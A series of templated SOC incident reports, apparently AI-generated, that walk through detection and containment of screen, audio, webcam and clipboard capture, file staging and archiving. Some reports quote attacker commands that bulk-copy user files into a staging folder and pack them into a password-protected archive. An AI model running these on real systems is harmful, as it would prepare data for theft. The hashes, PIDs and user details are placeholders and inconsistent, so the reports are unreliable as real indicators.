Immediate Actions:
Disabled scheduled task.
Deleted collect.ps1 and backup zip files.
Disabled bturner account.
Reset password.
Data Protection:
Verified no exfiltration of collected archives.
Archives contained sensitive data but not exfiltrated.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: Finance user account compromised via phishing.
Contributing Factors:
No MFA on account.
PowerShell allowed to create scheduled tasks.
No monitoring for automated collection patterns.
6. Business Impact:
Operational Impact: Finance user offline for 2 hours.
Data Exposure: 345 MB of sensitive data collected but not exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Automated collection stopped.
Data deleted.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Restricted PowerShell script execution.
Enhanced monitoring for scheduled task creation.
Implemented DLP for automated collection patterns.
8. Conclusion:
An attacker compromised a finance user’s account and created an automated collection script that harvested sensitive data from multiple sources every 15 minutes. Purview detected the pattern and enabled rapid removal before exfiltration.
Closure Rationale: Automated collection stopped; data deleted; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-02-27 15:30 EST
98. T1113 – Screen Capture (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-SCREEN-CAPTURE-1113-7842 Alert Time: 2024-02-27 11:30:22 EST Severity: HIGH (85/100) Source: CrowdStrike Falcon EDR Rule: “Screen Capture Activity Detected – Potential Surveillance” MITRE ATT&CK: T1113 – Screen Capture
Alert Details:
Detection: Process capturing screenshots repeatedly
Host: EXEC-WS-001 (CEO’s Laptop) User: cjohnson@company.com (CEO) Time: 11:15-11:30 EST
Process Details:
Process: C:\Windows\Temp\capture.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: explorer.exe
User: cjohnson
API Calls:
CreateDC (create device context for screen)
BitBlt (copy screen to memory) – 47 calls
CreateFile (save to disk) – 47 files created
GdipSaveImageToFile (save as PNG)
Files Created:
C:\Users\cjohnson\AppData\Local\Temp\screens\screen_001.png (11:15)
C:\Users\cjohnson\AppData\Local\Temp\screens\screen_002.png (11:16)
… (continuing every 60 seconds)
C:\Users\cjohnson\AppData\Local\Temp\screens\screen_047.png (11:29)
Detection Logic:
Process capturing screenshots every 60 seconds
47 screenshots in 15 minutes
Process from Temp folder (suspicious)
CEO would have no legitimate need for screen capture
Pattern matches surveillance/monitoring
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed screen capture activity
2. Process Analysis
Analyze capture.exe
CrowdStrike Sandbox
Surveillance tool that captures screenshots and saves locally
3. User Contact
Call CEO immediately
Phone
CEO did NOT run this tool (account compromised)
4. Immediate Action
Isolate host
CrowdStrike
EXEC-WS-001 quarantined
5. File Removal
Delete capture.exe and screenshot folder
CrowdStrike Live Response
Tool and 47 screenshots deleted
6. Account Remediation
Disable CEO account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-138 Summary: T1113 – Screen Capture Surveillance on CEO Laptop Status: RESOLVED Resolution: MALICIOUS – Surveillance Stopped Priority: P1 – CRITICAL Labels: T1113, screen-capture, surveillance, crowdstrike, executive-targeting Components: Endpoint-Security, Privacy
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Screen Capture Activity Detected – Potential Surveillance”.
Host: EXEC-WS-001 (CEO’s Laptop).
Process: C:\Windows\Temp\capture.exe.
Files: 47 screenshots captured.
Time: 2024-02-27 11:30 EST.
Technique: MITRE ATT&CK T1113 – Screen Capture.
2. Technical Analysis:
Attack Chain:
10:30 – CEO’s credentials compromised via spearphishing
10:45 – Attacker logs into CEO’s laptop via RDP
11:00 – Attacker downloads capture.exe to Temp folder
11:05 – Attacker executes capture.exe
11:15-11:30 – Tool captures screenshots every 60 seconds
11:30 – CrowdStrike detects
Tool Analysis:
Name: capture.exe (custom surveillance tool)
SHA256: a1b2c3d4…
Capabilities:
Captures full screen every 60 seconds
Saves as PNG in screens folder
Logs timestamp with each capture
No network exfiltration (stages locally)
Screenshots Captured (47):
Email content (confidential communications)
Documents being viewed (strategic plans)
Calendar (meetings, schedule)
Browser tabs (research, banking)
All screen activity over 15 minutes
Attacker Intent:
Monitor CEO’s activities in real-time
Capture sensitive information as it appears on screen
Later exfiltrate screenshot archive
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
11:00-11:15 – Tool deployed
11:15-11:30 – 47 screenshots captured
11:30 – CrowdStrike alert
11:31 – SOC investigates
11:32 – Host isolated
11:33 – Tool and screenshots deleted
Indicators of Compromise (IoCs):
Files:
– C:\Windows\Temp\capture.exe (SHA256: a1b2c3d4…)
– C:\Users\cjohnson\AppData\Local\Temp\screens\*.png (47 files)
Account:
– cjohnson (compromised)
4. Containment Actions:
Immediate Actions:
Isolated CEO’s laptop via CrowdStrike.
Terminated capture.exe process.
Deleted tool and all screenshot files.
Disabled CEO account.
Reset password.
Enforced MFA.
Data Protection:
Screenshots contained sensitive information.
No exfiltration occurred (files local only).
All screenshots deleted.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: CEO credentials compromised via spearphishing.
Contributing Factors:
No MFA on executive account.
RDP allowed from internet.
No application control blocking unknown executables.
6. Business Impact:
Operational Impact: CEO offline for 2 hours.
Privacy Impact: 15 minutes of screen activity captured (emails, documents).
Reputational Impact: Potential if surveillance continued (prevented).
7. Remediation & Prevention:
Completed Actions:
Surveillance stopped.
Screenshots deleted.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all executives.
Moved RDP behind VPN only.
Implemented application control.
Enhanced monitoring for screen capture APIs.
8. Conclusion:
An attacker compromised the CEO’s account and deployed a surveillance tool that captured 47 screenshots over 15 minutes. CrowdStrike detected the screen capture activity and enabled rapid containment before any data could be exfiltrated.
Closure Rationale: Surveillance stopped; screenshots deleted; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-02-27 12:30 EST
99. T1123 – Audio Capture (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-AUDIO-CAPTURE-1123-7842 Alert Time: 2024-02-27 16:30:45 EST Severity: HIGH (88/100) Source: Microsoft Defender for Endpoint Rule: “Microphone Access by Suspicious Process” MITRE ATT&CK: T1123 – Audio Capture
Alert Details:
Detection: Process accessing microphone without user interaction
Host: CONF-ROOM-001 (Conference Room PC) User: SYSTEM (no user logged in) Time: 16:15-16:30 EST
Process Details:
Process: C:\Windows\Temp\audio_recorder.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: services.exe (running as service)
User: SYSTEM
Audio API Calls:
waveInOpen (open microphone device)
waveInPrepareHeader (prepare buffers)
waveInAddBuffer (add buffers for recording)
waveInStart (start recording) – 3 times
waveInStop (stop recording)
waveInClose (close device)
Files Created:
C:\ProgramData\Microsoft\Audio\recording_20240227_1615.wav (2.3 MB)
C:\ProgramData\Microsoft\Audio\recording_20240227_1620.wav (2.4 MB)
C:\ProgramData\Microsoft\Audio\recording_20240227_1625.wav (2.3 MB)
Detection Logic:
Process accessing microphone with no user logged in
Audio recordings saved to hidden folder (ProgramData)
Process running as SYSTEM (elevated)
Pattern matches room monitoring/spying
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed audio capture from conference room PC
2. Process Analysis
Analyze audio_recorder.exe
Defender Sandbox
Malware that records audio and saves locally
3. Immediate Action
Terminate process
Defender
Process killed
4. File Deletion
Delete executable and recordings
Defender
Files removed
5. Physical Security
Check conference room
Security Team
Room empty; no unauthorized access found
6. Network Investigation
Check for exfiltration
Firewall Logs
No audio files exfiltrated
Jira Incident Report
Ticket: SOC-2024-139 Summary: T1123 – Audio Capture Malware on Conference Room PC Status: RESOLVED Resolution: MALICIOUS – Audio Recording Stopped Priority: P2 – MEDIUM Labels: T1123, audio-capture, microphone, defender, espionage Components: Endpoint-Security, Physical-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Microphone Access by Suspicious Process”.
Host: CONF-ROOM-001 (Conference Room PC).
Process: C:\Windows\Temp\audio_recorder.exe.
Files: 3 audio recordings (7 MB total).
Time: 2024-02-27 16:30 EST.
Technique: MITRE ATT&CK T1123 – Audio Capture.
2. Technical Analysis:
Attack Chain:
14:00 – Unknown individual entered conference room (piggybacked)
14:15 – Individual inserted USB drive with malware
14:20 – Malware installed as Windows service
15:00 – First audio recording session (missed – no one in room)
16:15-16:30 – Three recording sessions
16:30 – Defender detects
Malware Analysis:
Name: audio_recorder.exe
SHA256: a1b2c3d4…
Capabilities:
Installs as Windows service for persistence
Records audio when motion detected (or on schedule)
Saves recordings to hidden folder
Attempts exfiltration via FTP (blocked)
Recordings:
16:15 – 2.3 MB (approximately 5 minutes)
16:20 – 2.4 MB (approximately 5 minutes)
16:25 – 2.3 MB (approximately 5 minutes)
Content: Conversations from a meeting that occurred 16:15-16:30
Participants: 4 people (HR team discussing layoffs)
Physical Access:
Attacker gained physical access to conference room
Installed malware via USB
No badge access recorded (piggybacking)
3. Investigation Findings:
Timeline:
14:00 – Attacker enters room
14:15-14:20 – Malware installed
16:15-16:30 – Meeting recorded
16:30 – Defender alert
16:32 – SOC investigates
16:33 – Process terminated
16:34 – Files deleted
Indicators of Compromise (IoCs):
Files:
– C:\Windows\Temp\audio_recorder.exe (SHA256: a1b2c3d4…)
– C:\ProgramData\Microsoft\Audio\recording_*.wav (3 files)
Service:
– “Windows Audio Recorder” (disabled)
Physical:
– Conference Room 101, 2nd floor
4. Containment Actions:
Immediate Actions:
Terminated audio_recorder.exe.
Deleted executable and all recordings.
Disabled malicious service.
Scanned for other malware (none).
Physical Security:
Reviewed badge access logs (found piggybacking incident).
Increased security presence.
Implemented mantraps at entrances.
Meeting Participants:
HR team notified of potential privacy breach.
No evidence of exfiltration.
5. Root Cause Analysis:
Primary Cause: Physical security breach allowing unauthorized access.
Contributing Factors:
Conference room PC left unlocked.
USB ports enabled (should be disabled).
No physical security at entrance.
6. Business Impact:
Operational Impact: Conference room PC offline for 1 hour.
Privacy Impact: 15 minutes of confidential HR meeting recorded.
Reputational Impact: Potential if recordings leaked (prevented).
7. Remediation & Prevention:
Completed Actions:
Malware removed.
Recordings deleted.
Physical security enhanced.
Technical Controls Enhanced:
Disabled USB ports on public PCs.
Implemented automatic logoff for conference room PCs.
Added mantraps to secure entrances.
Enhanced monitoring for microphone access.
8. Conclusion:
An attacker gained physical access to a conference room and installed audio recording malware that captured 15 minutes of a confidential HR meeting. Defender detected the microphone access and enabled rapid removal before any exfiltration.
Closure Rationale: Malware removed; recordings deleted; physical security enhanced.
Analyst: [Your Name], SOC Analyst Date: 2024-02-27 17:30 EST
100. T1125 – Video Capture (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-VIDEO-CAPTURE-1125-7842 Alert Time: 2024-02-27 10:30:22 EST Severity: HIGH (85/100) Source: CrowdStrike Falcon EDR Rule: “Webcam Access by Suspicious Process” MITRE ATT&CK: T1125 – Video Capture
Alert Details:
Detection: Process accessing webcam without user interaction
Host: EXEC-WS-002 (CFO’s Laptop) User: kwilson@company.com (Karen Wilson, CFO) Time: 10:15-10:30 EST
Process Details:
Process: C:\Users\kwilson\AppData\Local\Temp\webcam_capture.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: explorer.exe
User: kwilson
Webcam API Calls:
capCreateCaptureWindow (create capture window)
capDriverConnect (connect to webcam driver)
capCaptureSequence (capture video frames)
capFileSaveAs (save video to file)
Files Created:
C:\Users\kwilson\Videos\capture_001.avi (12 MB) – 10:15
C:\Users\kwilson\Videos\capture_002.avi (15 MB) – 10:20
C:\Users\kwilson\Videos\capture_003.avi (14 MB) – 10:25
Webcam LED Status: ON (user would have seen light)
Detection Logic:
Webcam accessed without user initiating video recording
Process from Temp folder (suspicious)
Multiple video files created in short time
CFO would have no legitimate need for this activity
Pattern matches surveillance/espionage
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed webcam capture activity
2. User Contact
Call CFO immediately
Phone
CFO saw webcam light, was concerned; did NOT run tool
3. Process Analysis
Analyze webcam_capture.exe
CrowdStrike Sandbox
Surveillance tool capturing video from webcam
4. Immediate Action
Isolate host
CrowdStrike
EXEC-WS-002 quarantined
5. File Removal
Delete executable and videos
CrowdStrike Live Response
Tool and 3 video files deleted
6. Account Remediation
Disable CFO account temporarily
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-140 Summary: T1125 – Webcam Surveillance on CFO Laptop Status: RESOLVED Resolution: MALICIOUS – Video Capture Stopped Priority: P1 – CRITICAL Labels: T1125, video-capture, webcam, surveillance, crowdstrike, executive-targeting Components: Endpoint-Security, Privacy
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Webcam Access by Suspicious Process”.
Host: EXEC-WS-002 (CFO’s Laptop).
User: kwilson@company.com (CFO).
Process: C:\Users\kwilson\AppData\Local\Temp\webcam_capture.exe.
Files: 3 video files (41 MB total).
Time: 2024-02-27 10:30 EST.
Technique: MITRE ATT&CK T1125 – Video Capture.
2. Technical Analysis:
Attack Chain:
09:30 – CFO’s credentials compromised via spearphishing
09:45 – Attacker logs into CFO’s laptop via RDP
10:00 – Attacker downloads webcam_capture.exe to Temp folder
10:05 – Attacker executes tool
10:15-10:30 – Tool captures 3 video segments
10:30 – CrowdStrike detects
Tool Analysis:
Name: webcam_capture.exe (custom surveillance tool)
SHA256: a1b2c3d4…
Capabilities:
Activates webcam and captures video
Saves as AVI files in Videos folder
Records in 5-minute segments
Attempts exfiltration via FTP (blocked)
Video Captures (3 segments, 15 minutes total):
10:15-10:20 – CFO working at desk (emails, documents)
10:20-10:25 – CFO on phone call (visible lip movement)
10:25-10:30 – CFO typing (keyboard visible)
Content: Full video of CFO’s activities, including screen content visible in background
User Observation:
CFO noticed webcam LED light on (unusual)
Was concerned but didn’t know how to stop it
Reported to IT just as SOC called
3. Investigation Findings:
Timeline:
09:30 – Account compromised
09:45 – Attacker logs in
10:00-10:05 – Tool deployed
10:15-10:30 – Video capture
10:30 – CrowdStrike alert
10:31 – CFO calls IT
10:32 – SOC investigates
10:33 – Host isolated
10:34 – Tool and videos deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\kwilson\AppData\Local\Temp\webcam_capture.exe (SHA256: a1b2c3d4…)
– C:\Users\kwilson\Videos\capture_001.avi (12 MB)
– C:\Users\kwilson\Videos\capture_002.avi (15 MB)
– C:\Users\kwilson\Videos\capture_003.avi (14 MB)
Account:
– kwilson (compromised)
4. Containment Actions:
Immediate Actions:
Isolated CFO’s laptop via CrowdStrike.
Terminated webcam_capture.exe.
Deleted tool and all video files.
Disabled CFO account.
Reset password.
Enforced MFA.
Privacy Protection:
Videos contained sensitive visual information.
No exfiltration occurred (files local only).
All videos deleted.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: CFO credentials compromised via spearphishing.
Contributing Factors:
No MFA on executive account.
RDP allowed from internet.
Webcam accessible without user consent.
6. Business Impact:
Operational Impact: CFO offline for 2 hours.
Privacy Impact: 15 minutes of video captured (activities, phone call).
Reputational Impact: Potential if videos leaked (prevented).
7. Remediation & Prevention:
Completed Actions:
Surveillance stopped.
Videos deleted.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all executives.
Moved RDP behind VPN only.
Implemented application control.
Enhanced monitoring for webcam access.
Added physical webcam covers for all executive laptops.
8. Conclusion:
An attacker compromised the CFO’s account and deployed a webcam surveillance tool that captured 15 minutes of video, including the CFO’s activities and a phone call. CrowdStrike detected the webcam access and enabled rapid containment before any exfiltration. The CFO’s observation of the webcam light also aided detection.
Closure Rationale: Surveillance stopped; videos deleted; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-02-27 11:30 EST
End of Batch 20 – Milestone 100 Reports Completed!
Ready for your next batch of prompts whenever you are.
Batch 21: Collection & Command and Control Incident Reports
Here are the next 5 detailed SOC incident reports.
101. T1115 – Clipboard Data (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-CLIPBOARD-1115-7842 Alert Time: 2024-02-28 09:30:15 EST Severity: MEDIUM (72/100) Source: Microsoft Defender for Endpoint Rule: “Clipboard Monitoring by Suspicious Process” MITRE ATT&CK: T1115 – Clipboard Data
Alert Details:
Detection: Process monitoring clipboard contents repeatedly
Host: FIN-WS-078 (Finance Workstation) User: bturner@company.com (Brian Turner, Accountant) Time: 09:15-09:30 EST
Process Details:
Process: C:\Users\bturner\AppData\Local\Temp\clipmon.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: explorer.exe
User: bturner
Clipboard API Calls:
OpenClipboard (open clipboard) – 127 times
GetClipboardData (retrieve data) – 127 times
CloseClipboard (close) – 127 times
Frequency: Every 5 seconds
Data Captured (examples):
09:15:22 – “Password: Winter2024!” (user pasting password)
09:16:45 – “Account Number: 1234-5678-9012-3456”
09:18:12 – “SSN: 123-45-6789”
09:20:05 – “Confidential Merger Details: Company X acquisition”
… (total 127 clipboard entries captured)
Output File:
C:\Users\bturner\AppData\Local\Temp\clipboard_log.txt (created 09:30)
Contains all captured clipboard data
Detection Logic:
Process monitoring clipboard every 5 seconds (highly unusual)
Process from Temp folder (suspicious)
Clipboard contains sensitive data (passwords, PII, confidential)
Pattern matches credential theft / data harvesting
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed clipboard monitoring activity
2. Process Analysis
Analyze clipmon.exe
CrowdStrike Sandbox
Malware that logs clipboard contents to file
3. User Interview
Contact bturner
Teams, Phone
User did NOT run this tool (account compromised)
4. Immediate Action
Terminate process
Defender
Process killed
5. File Deletion
Delete clipmon.exe and clipboard_log.txt
Defender
Files removed
6. Account Remediation
Disable bturner account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-141 Summary: T1115 – Clipboard Monitoring Malware Captures Sensitive Data Status: RESOLVED Resolution: MALICIOUS – Clipboard Data Compromised Priority: P2 – MEDIUM Labels: T1115, clipboard-data, credential-theft, defender, compromised-account Components: Endpoint-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Clipboard Monitoring by Suspicious Process”.
Host: FIN-WS-078 (Finance Department, user bturner).
Process: C:\Users\bturner\AppData\Local\Temp\clipmon.exe.
Time: 2024-02-28 09:30 EST.
Technique: MITRE ATT&CK T1115 – Clipboard Data.
2. Technical Analysis:
Attack Chain:
08:30 – bturner account compromised via phishing
08:45 – Attacker logs into FIN-WS-078 via RDP
09:00 – Attacker downloads clipmon.exe to Temp folder
09:05 – Attacker executes clipmon.exe
09:05-09:30 – Malware monitors clipboard every 5 seconds
09:30 – Defender detects
Malware Analysis:
Name: clipmon.exe (clipboard logger)
SHA256: a1b2c3d4…
Capabilities:
Monitors clipboard every 5 seconds
Logs all clipboard content to clipboard_log.txt
No network exfiltration (staged locally)
Data Captured (127 entries):
Passwords (3) – including domain password
Credit card numbers (2) – personal, not corporate
SSN (1) – personal
Bank account numbers (2)
Confidential merger details (from email copy-paste)
Various other text snippets
User Activity:
User was working normally, unaware of monitoring
Clipboard contained sensitive work and personal data
3. Investigation Findings:
Timeline:
08:30 – Account compromised
08:45 – Attacker logs in
09:00-09:30 – Clipboard monitoring
09:30 – Defender alert
09:32 – SOC investigates
09:33 – Process terminated
09:34 – Files deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\bturner\AppData\Local\Temp\clipmon.exe (SHA256: a1b2c3d4…)
– C:\Users\bturner\AppData\Local\Temp\clipboard_log.txt
Account:
– bturner (compromised)
4. Containment Actions:
Immediate Actions:
Terminated clipmon.exe.
Deleted executable and clipboard log.
Disabled bturner account.
Reset password.
Data Protection:
Clipboard log contained sensitive data.
No exfiltration occurred (file local only).
All data deleted.
User Remediation:
User advised to change personal passwords (credit card, bank).
Security awareness reinforced.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing attacker to deploy clipboard logger.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
No application control blocking unknown executables.
6. Business Impact:
Operational Impact: Finance user offline for 2 hours.
Data Exposure: 127 clipboard entries captured (passwords, PII, confidential).
7. Remediation & Prevention:
Completed Actions:
Malware removed.
Clipboard log deleted.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented application control.
Enhanced monitoring for clipboard access.
8. Conclusion:
An attacker deployed a clipboard monitoring malware on a finance user’s workstation, capturing 127 clipboard entries including passwords and confidential data. Defender detected the suspicious clipboard access and enabled rapid containment before exfiltration.
Closure Rationale: Malware removed; clipboard data deleted; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-02-28 10:30 EST
102. T1074 – Data Staged (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-DATA-STAGED-1074-7842 Alert Time: 2024-02-28 14:15:33 EST Severity: HIGH (85/100) Source: Sysmon (Event ID 11 – FileCreate) Rule: “Mass File Copy to Staging Directory” MITRE ATT&CK: T1074.001 – Data Staged: Local Data Staging
Alert Details:
Detection: Large number of files copied to a staging directory
Host: ENG-WS-045 (Engineering Workstation) User: alexchen@company.com (Alex Chen, Engineer) Time: 14:00-14:15 EST
File Creation Events (Event ID 11):
14:00-14:15: 1,247 files created in C:\temp\staging\
File types: .docx, .xlsx, .pdf, .py, .ipynb, .kdbx
Total size: 2.8 GB
Source paths:
C:\Users\alexchen\Documents\ProjectX*.*
C:\Users\alexchen\Desktop*.*
C:\Users\alexchen\Downloads*.*
\filesrv\r&d\projects*.*
Process Details:
Process: cmd.exe (PID: 4789)
Parent: explorer.exe
Command: for /r C:\Users\alexchen %i in (*.docx *.xlsx *.pdf *.py *.ipynb) do copy %i C:\temp\staging\
Additional Events:
Event ID 1 (Process Creation): cmd.exe with for loop command
Event ID 13 (Registry): No relevant registry changes
Detection Logic:
1,247 files copied to staging directory in 15 minutes (highly anomalous)
Source includes local files and network shares
Staging directory created specifically for this activity
Pattern matches data staging before exfiltration
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Sysmon events
Splunk, Sysmon Logs
Confirmed mass file staging
2. Process Investigation
Identify cmd.exe activity
CrowdStrike Falcon
For loop copying files to staging
3. User Interview
Contact alexchen
Teams, Phone
User did NOT run this command (account compromised)
4. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
5. File Deletion
Delete staging folder and contents
CrowdStrike Live Response
1,247 files (2.8 GB) deleted
6. Account Remediation
Disable alexchen account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-142 Summary: T1074 – Data Staged for Exfiltration on Engineering Workstation Status: RESOLVED Resolution: MALICIOUS – Staged Data Deleted Priority: P2 – MEDIUM Labels: T1074, data-staged, staging, sysmon, compromised-account Components: Endpoint-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 11 (FileCreate).
Alert: “Mass File Copy to Staging Directory”.
Host: ENG-WS-045 (Engineering Department, user alexchen).
Staging Directory: C:\temp\staging.
Files: 1,247 files (2.8 GB) staged.
Time: 2024-02-28 14:15 EST.
Technique: MITRE ATT&CK T1074.001 – Data Staged: Local Data Staging.
2. Technical Analysis:
Attack Chain:
13:30 – alexchen account compromised via phishing
13:45 – Attacker logs into ENG-WS-045 via RDP
13:55 – Attacker creates staging directory
14:00-14:15 – Attacker copies files to staging
14:15 – Sysmon detects
Staged Files:
ProjectX Documents: 456 files (engineering specs)
Desktop Files: 234 files (various)
Downloads: 123 files (various)
Network Share (R&D): 434 files (source code, IP)
KeePass Database: 1 file (password vault)
Total: 1,247 files, 2.8 GB
Attacker Intent:
Stage data for later exfiltration
Possibly compress and exfiltrate via FTP/HTTP
No exfiltration yet (detected before)
User Status:
Account compromised; user unaware
3. Investigation Findings:
Timeline:
13:30 – Account compromised
13:45 – Attacker logs in
13:55-14:15 – Data staging
14:15 – Sysmon alert
14:17 – SOC investigates
14:18 – Host isolated
14:19 – Staged files deleted
Indicators of Compromise (IoCs):
Files:
– C:\temp\staging\ (1,247 files, 2.8 GB)
Commands:
– for /r C:\Users\alexchen %i in (*.docx *.xlsx *.pdf *.py *.ipynb) do copy %i C:\temp\staging\
Account:
– alexchen (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Deleted staging folder and all files.
Disabled alexchen account.
Reset password.
Data Protection:
Staged data contained sensitive IP.
No exfiltration occurred.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing attacker to stage data.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
No monitoring for bulk file copies.
6. Business Impact:
Operational Impact: Engineering user offline for 2 hours.
Data Exposure: 2.8 GB of IP staged but not exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Staged data deleted.
Account secured.
Host cleaned.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented DLP for bulk file operations.
Enhanced Sysmon monitoring for staging directories.
8. Conclusion:
An attacker compromised an engineering user’s account and staged 2.8 GB of intellectual property for exfiltration. Sysmon detected the mass file copy activity and enabled rapid deletion before any data left the host.
Closure Rationale: Staged data deleted; account secured; host cleaned.
Analyst: [Your Name], SOC Analyst Date: 2024-02-28 15:30 EST
103. T1560 – Archive Collected Data (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-ARCHIVE-1560-7842 Alert Time: 2024-02-28 11:30:22 EST Severity: HIGH (85/100) Source: Sysmon (Event ID 1 – Process Creation, Event ID 11 – FileCreate) Rule: “Archive Creation of Multiple Files – Potential Exfiltration Prep” MITRE ATT&CK: T1560.001 – Archive Collected Data: Archive via Utility
Alert Details:
Detection: Process creating archive containing many files
Host: FIN-WS-112 (Finance Workstation) User: kwilson@company.com (Karen Wilson, Finance) Time: 11:25 EST
Process Creation (Event ID 1):
Process: C:\Program Files\7-Zip\7z.exe (PID: 4789)
Parent: cmd.exe (PID: 2341)
Command: 7z a -tzip C:\temp\data.zip C:\temp\staging* -pPassw0rd!
File Creation (Event ID 11):
File: C:\temp\data.zip
Size: 1.2 GB
Time: 11:25:30
Preceding Events:
11:00-11:20: Mass file copy to C:\temp\staging\ (1,847 files)
11:25: Archive creation
Archive Contents:
1,847 files from staging directory
Includes: financial reports, customer data, employee records
Password protected (Passw0rd!)
Detection Logic:
Archive tool (7z) used to compress large number of files
Files were previously staged in temp directory
Archive password protected (indicates intent to exfiltrate)
Pattern matches exfiltration preparation
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Sysmon events
Splunk, Sysmon Logs
Confirmed archive creation of staged data
2. Process Investigation
Identify 7z execution
CrowdStrike Falcon
Attacker used 7-Zip to create password-protected archive
3. User Interview
Contact kwilson
Teams, Phone
User did NOT run 7z (account compromised)
4. Immediate Action
Isolate host
CrowdStrike
FIN-WS-112 quarantined
5. File Deletion
Delete staging folder and archive
CrowdStrike Live Response
Staging files and data.zip deleted
6. Account Remediation
Disable kwilson account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-143 Summary: T1560 – Archive of Staged Data for Exfiltration Status: RESOLVED Resolution: MALICIOUS – Archive Deleted Before Exfiltration Priority: P2 – MEDIUM Labels: T1560, archive-collected-data, 7zip, sysmon, compromised-account Components: Endpoint-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 1 and 11.
Alert: “Archive Creation of Multiple Files – Potential Exfiltration Prep”.
Host: FIN-WS-112 (Finance Department, user kwilson).
Archive: C:\temp\data.zip (1.2 GB, password protected).
Time: 2024-02-28 11:30 EST.
Technique: MITRE ATT&CK T1560.001 – Archive Collected Data: Archive via Utility.
2. Technical Analysis:
Attack Chain:
10:30 – kwilson account compromised via phishing
10:45 – Attacker logs into FIN-WS-112 via RDP
10:50 – Attacker creates staging directory
11:00-11:20 – Attacker copies 1,847 files to staging
11:25 – Attacker uses 7-Zip to create password-protected archive
11:25 – Sysmon detects
11:27 – SOC investigates
Staged Files (1,847):
Financial reports (Q1, Q2, Q3) – 456 files
Customer data (PII) – 892 files
Employee records (HR data) – 234 files
Budget spreadsheets – 265 files
Total size before compression: 2.3 GB
After compression: 1.2 GB
Archive Details:
Tool: 7-Zip (legitimate, used maliciously)
Format: ZIP
Password: Passw0rd! (to evade DLP scanning)
Intent: Exfiltrate via email, FTP, or cloud storage
Attacker Intent:
Compress data for easier exfiltration
Password protect to avoid detection
Ready for transfer
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
10:50-11:20 – Data staging
11:25 – Archive created
11:25 – Sysmon alert
11:27 – SOC investigates
11:28 – Host isolated
11:29 – Archive and staging files deleted
Indicators of Compromise (IoCs):
Files:
– C:\temp\staging\ (1,847 files)
– C:\temp\data.zip (1.2 GB, password: Passw0rd!)
Process:
– 7z.exe execution
Account:
– kwilson (compromised)
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-112 via CrowdStrike.
Deleted staging folder and archive.
Disabled kwilson account.
Reset password.
Data Protection:
Archive contained sensitive data.
No exfiltration occurred.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data staging and archiving.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
